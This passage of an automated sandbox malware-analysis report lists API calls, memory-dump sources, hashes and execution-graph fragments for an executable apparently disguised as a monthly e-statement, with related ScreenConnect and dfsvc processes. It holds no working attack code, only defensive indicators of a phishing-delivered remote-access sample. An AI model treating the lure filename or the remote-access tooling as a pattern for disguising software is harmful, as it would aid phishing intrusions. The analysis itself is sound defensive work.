                                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe,00000104), ref: 009A2F93
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A305E
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 009A3068
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                    • String ID: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe
                                                                                                                                                                                                                                                    • API String ID: 2506810119-523020616
                                                                                                                                                                                                                                                    • Opcode ID: f16904c546643aae71a0d869174b2976b7a42eb28d12ffe7e9f451e278f5a1b9
                                                                                                                                                                                                                                                    • Instruction ID: 3c29098c12cac6862cdfee08b653947ad59b4286a683ba0f9ce3cf78b3980c1a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f16904c546643aae71a0d869174b2976b7a42eb28d12ffe7e9f451e278f5a1b9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0318F71A04258AFCB21DB99DC81AAEBBFCEFC6710F10806AF40497251D6748A40DBD1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,?,00000000,?,?,009A8BD9,?,00000000,?), ref: 009A892D
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,009A8BD9,?,00000000,?,00000000,00000000,?,00000000), ref: 009A895B
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,009A8BD9,?,00000000,?,00000000,00000000,?,00000000), ref: 009A898C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                                                                                                                    • String ID: kz]G
                                                                                                                                                                                                                                                    • API String ID: 2456169464-1940436402
                                                                                                                                                                                                                                                    • Opcode ID: 38788e87a9c816950a8dd613b3a705ea3f1f57c39a1e1431708bca070777dbe5
                                                                                                                                                                                                                                                    • Instruction ID: 039eecd2ec3780581e2f9c0762edcc618d64c6f41da43c9c55ca87158e86070f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38788e87a9c816950a8dd613b3a705ea3f1f57c39a1e1431708bca070777dbe5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10316D71A1021A9FDB24CF59DC90AEBB7B8FF49314F0444A9E91AD7250DB30AD80CFA1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,009A2594,00000000,?,009B1B50,?,?,?,009A2737,00000004,InitializeCriticalSectionEx,009ABC48,InitializeCriticalSectionEx), ref: 009A25F0
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,009A2594,00000000,?,009B1B50,?,?,?,009A2737,00000004,InitializeCriticalSectionEx,009ABC48,InitializeCriticalSectionEx,00000000,?,009A24C7), ref: 009A25FA
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 009A2622
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                                                                                                    • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,009A5784,00000000,00000000,00000000,00000000,?,009A5981,00000006,FlsSetValue), ref: 009A580F
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,009A5784,00000000,00000000,00000000,00000000,?,009A5981,00000006,FlsSetValue,009AC4D8,FlsSetValue,00000000,00000364,?,009A44F6), ref: 009A581B
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,009A5784,00000000,00000000,00000000,00000000,?,009A5981,00000006,FlsSetValue,009AC4D8,FlsSetValue,00000000), ref: 009A5829
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 009A4EBE: GetOEMCP.KERNEL32(00000000,?,?,009A5147,?), ref: 009A4EE9
                                                                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,009A518C,?,00000000), ref: 009A535F
                                                                                                                                                                                                                                                    • GetCPInfo.KERNEL32(00000000,009A518C,?,?,?,009A518C,?,00000000), ref: 009A5372
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CodeInfoPageValid
                                                                                                                                                                                                                                                    • String ID: kz]G
                                                                                                                                                                                                                                                    • API String ID: 546120528-1940436402
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 009A4FBB
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Info
                                                                                                                                                                                                                                                    • String ID: $kz]G
                                                                                                                                                                                                                                                    • API String ID: 1807457897-3502458879
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                    • String ID: kz]G
                                                                                                                                                                                                                                                    • API String ID: 269201875-1940436402
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,009A8BC9,?,00000000,?,00000000,00000000), ref: 009A8836
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,009A8BC9,?,00000000,?,00000000,00000000,?,00000000), ref: 009A885F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                    • String ID: kz]G
                                                                                                                                                                                                                                                    • API String ID: 442123175-1940436402
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,009A8BE9,?,00000000,?,00000000,00000000), ref: 009A8748
• GetLastError.KERNEL32(?,009A8BE9,?,00000000,?,00000000,00000000,?,00000000), ref: 009A8771
Strings
Memory Dump Source
• Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: kz]G
• API String ID: 442123175-1940436402
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 009A14C6
• ___raise_securityfailure.LIBCMT ref: 009A15AE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
Similarity
• API ID: FeaturePresentProcessor___raise_securityfailure
• String ID: kz]G
• API String ID: 3761405300-1940436402
APIs
• LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 009A5A86
Strings
Memory Dump Source
• Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
Similarity
• API ID: String
• String ID: LCMapStringEx$kz]G
• API String ID: 2568140703-956137866
APIs
• InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 009A59FE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
Similarity
• API ID: CountCriticalInitializeSectionSpin
• String ID: InitializeCriticalSectionEx$kz]G
• API String ID: 2593887523-2039192805
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
Similarity
• API ID: _abort
• String ID: kz]G$kz]G
• API String ID: 1888311480-861787974
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
Similarity
• API ID: Free
• String ID: FlsFree$kz]G
• API String ID: 3978063606-1205607610
                                                                                                                                                                                                                                                    • Opcode ID: ac851cd7a537a86c74df7527a369ea3bd3fa5c133965713974668d5b61a085ee
                                                                                                                                                                                                                                                    • Instruction ID: 1d4b8410ee80c20af647f10a22ee5bd1b85f8567fc6864c905919fe288437ef9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac851cd7a537a86c74df7527a369ea3bd3fa5c133965713974668d5b61a085ee
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3EE02B71B4961CABC3007B549C2AE3FBFA4DF8BB54B42815DFC055B251EE344D01A6C9
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Alloc
                                                                                                                                                                                                                                                    • String ID: FlsAlloc$kz]G
                                                                                                                                                                                                                                                    • API String ID: 2773662609-2178684103
                                                                                                                                                                                                                                                    • Opcode ID: d4e7678a1f071f0112ca27179f756e06802ca83970d10fb94b2710b0311c138a
                                                                                                                                                                                                                                                    • Instruction ID: 3db751116b337dc9a83e74b8ee6ced0de60328d0e5d8aa0736f08d611a7b2906
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4e7678a1f071f0112ca27179f756e06802ca83970d10fb94b2710b0311c138a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0DE02B30785218BB83117B64DC26A7E7FD4DF8BB35F424164FD099B250DE744D0195D9

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:17.9%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                    Total number of Nodes:113
                                                                                                                                                                                                                                                    Total number of Limit Nodes:11
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2984382940.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff848f40000_dfsvc.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: x]k-
                                                                                                                                                                                                                                                    • API String ID: 0-679281813
                                                                                                                                                                                                                                                    • Opcode ID: 0daef6d356cebc546d8498420ce40fcb6e0a8406d51c26d3bf513553b5a7247b
                                                                                                                                                                                                                                                    • Instruction ID: 902e09b0c2e0d2e21d1e59d1372921090975087cba5baede93d11de0d9665db2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0daef6d356cebc546d8498420ce40fcb6e0a8406d51c26d3bf513553b5a7247b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1CB11331E0DAC90FE356EB7858192B87FD1EF66650F0801BFC089D71E7EB28A8858345
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2984382940.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff848f40000_dfsvc.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CookieInternet
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 930238652-0
                                                                                                                                                                                                                                                    • Opcode ID: e679ba02d242cf7a187a622790515d0d5de55682f5d8e5cacb1fc38ac04b4767
                                                                                                                                                                                                                                                    • Instruction ID: 5a80f6aa2296e7148be245a683788188b270b123f742cb0365541a7a03ad342d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e679ba02d242cf7a187a622790515d0d5de55682f5d8e5cacb1fc38ac04b4767
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42918D30508A8D4FEB69EF2888557E93BE1EF69311F04426FE84DC7292CB74A9458B91
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2984382940.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff848f40000_dfsvc.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                                                    • Opcode ID: b325cc8ca1e7c2826ca6a0d1d28388cad2d8b5a6a881f31832437d39ef6be078
                                                                                                                                                                                                                                                    • Instruction ID: 432401925882081ada7a5df16d95f274b10f6a0c0a128d355e8f5185ebb55a57
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b325cc8ca1e7c2826ca6a0d1d28388cad2d8b5a6a881f31832437d39ef6be078
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5351C371A0CA5C8FDB59EF689845BE97BE0FB69310F1441AFD04DD3292CB34A845CB85
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2984024702.00007FF848E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E2D000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff848e2d000_dfsvc.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: e3004314e05ea4924f59dd9293f51160035b2df6ebe0b36be58cf5326f19880d
                                                                                                                                                                                                                                                    • Instruction ID: b68e39dbb8d43ff749d54df64869960cbc42895d452c9bbcd60b0f7101db053e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e3004314e05ea4924f59dd9293f51160035b2df6ebe0b36be58cf5326f19880d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B41F23180DBC58FE3569B2898459623FF0FF57360B1502EFD088CB1A7D629A846C7A2

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:12.9%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                    Total number of Nodes:12
                                                                                                                                                                                                                                                    Total number of Limit Nodes:0
                                                                                                                                                                                                                                                    execution_graph 11185 7ff848f084b8 11186 7ff848f084bf SetProcessMitigationPolicy 11185->11186 11188 7ff848f08552 11186->11188 11181 7ff848f0f67b 11182 7ff848f0f687 CreateFileW 11181->11182 11184 7ff848f0f7bc 11182->11184 11189 7ff848f04890 11190 7ff848f04899 GetTokenInformation 11189->11190 11192 7ff848f1f2d7 11190->11192 11193 7ff848f03dfa 11194 7ff848f1f470 CloseHandle 11193->11194 11196 7ff848f1f4eb 11194->11196

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 192 7ff848f04890-7ff848f048d9 198 7ff848f048dc 192->198 198->198 199 7ff848f048de-7ff848f04949 198->199 207 7ff848f0494c 199->207 207->207 208 7ff848f0494e-7ff848f1f2d5 GetTokenInformation 207->208 214 7ff848f1f2dd-7ff848f1f30e 208->214 215 7ff848f1f2d7 208->215 215->214
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2454397073.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ff848f00000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InformationToken
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4114910276-0

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 305 7ff848f0f67b-7ff848f0f710 310 7ff848f0f71a-7ff848f0f7ba CreateFileW 305->310 311 7ff848f0f712-7ff848f0f717 305->311 313 7ff848f0f7bc 310->313 314 7ff848f0f7c2-7ff848f0f7f5 310->314 311->310 313->314
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2454397073.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ff848f00000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 823142352-0

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 316 7ff848f084b8-7ff848f08550 SetProcessMitigationPolicy 319 7ff848f08558-7ff848f08587 316->319 320 7ff848f08552 316->320 320->319
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2454397073.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ff848f00000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1088084561-0

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
